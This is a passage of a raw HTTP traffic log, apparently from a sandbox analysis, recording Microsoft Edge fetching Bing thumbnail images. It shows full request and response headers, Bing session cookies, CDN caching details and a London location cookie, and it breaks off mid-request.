report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1733
cache-control: public, max-age=1209547
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049fc
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.afde16707eea1f9685bc3189e85ce9f7&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.afde16707eea1f9685bc3189e85ce9f7&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1385
cache-control: public, max-age=1209545
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049f7
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.0dbe33b9e05af3badbe8d6b4e57f4e0c&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.0dbe33b9e05af3badbe8d6b4e57f4e0c&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 668
cache-control: public, max-age=2189893
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049f2
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OSK.81e8df0ec566d93c71b3f1e0d1775ada&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.81e8df0ec566d93c71b3f1e0d1775ada&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1323
x-check-cacheable: YES
cache-control: public, max-age=1482760
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.40504a07
GET

https://th.bing.com/th?id=OSK.0462c705239330aba086ab83f23bc6a8&w=80&h=80&c=7&o=6&pid=SANGAM

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OSK.0462c705239330aba086ab83f23bc6a8&w=80&h=80&c=7&o=6&pid=SANGAM HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _RwBf=r=0&ilt=2&ihpd=0&ispd=2&rc=6&rb=0&gb=0&rg=200&pc=3&mtu=0&rbb=0&g=0&cid=&clo=0&v=2&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:49.6106115+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=6&RB=0&GB=0&RG=200&RP=3
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: bm_sv=F97CC3009A6FB08FD2D5AF48B8560EFC~YAAQTTZ6XAypT4iTAQAAWfgkkRq87VQXMtfSo820qO8DIocM89HFA7LHK81PkKU5u8kxoF0QQ3/O1xtdpc8ymqRGlr73zajjkFgnVjQWJ5Qs6RX4kJ8wtYIGYJ4H77p2pPEdOLlA4JyUyJaQ4BfYGO2sIHhMFWvAN8gyjpTZSyy9biamhWUXdjHOIaqe0B+bFexn+OzubKhGK7/WfXS1/Mw5pH2IDespPJL9wivyM1cVSudxg+iseyb21jSe2A==~1
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=2&HV=1733306921&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1414
cache-control: public, max-age=1209510
date: Wed, 04 Dec 2024 10:09:00 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306940.405049f1
x-check-cacheable: YES
GET

https://th.bing.com/th?id=OVP.4FvAebnC2mNBb6K6_SBIbQHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OVP.4FvAebnC2mNBb6K6_SBIbQHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 8888
x-check-cacheable: YES
cache-control: public, max-age=425966
date: Wed, 04 Dec 2024 10:09:01 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306941.40504dfa
GET

https://th.bing.com/th?id=OVP.dA449c-N9Zzje0ZEZgq5RAHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OVP.dA449c-N9Zzje0ZEZgq5RAHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100849
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601

Response

HTTP/2.0 200

content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 1317
x-check-cacheable: YES
cache-control: public, max-age=605601
date: Wed, 04 Dec 2024 10:09:01 GMT
x-cache: TCP_MISS from a92-122-54-43.deploy.akamaitechnologies.com (AkamaiGHost/11.7.1-5d2a058efeda81c5505a169a6e16c38e) (-)
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2b367a5c.1733306941.40504e04
GET

https://th.bing.com/th?id=OVP.I4s5HEEfmwG1zIb3b1xa4AHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7

msedge.exe

Remote address:

88.221.135.3:443

Request

GET /th?id=OVP.I4s5HEEfmwG1zIb3b1xa4AHgFo&w=197&h=110&c=7&rs=1&qlt=90&o=6&pid=1.7 HTTP/2.0
host: th.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
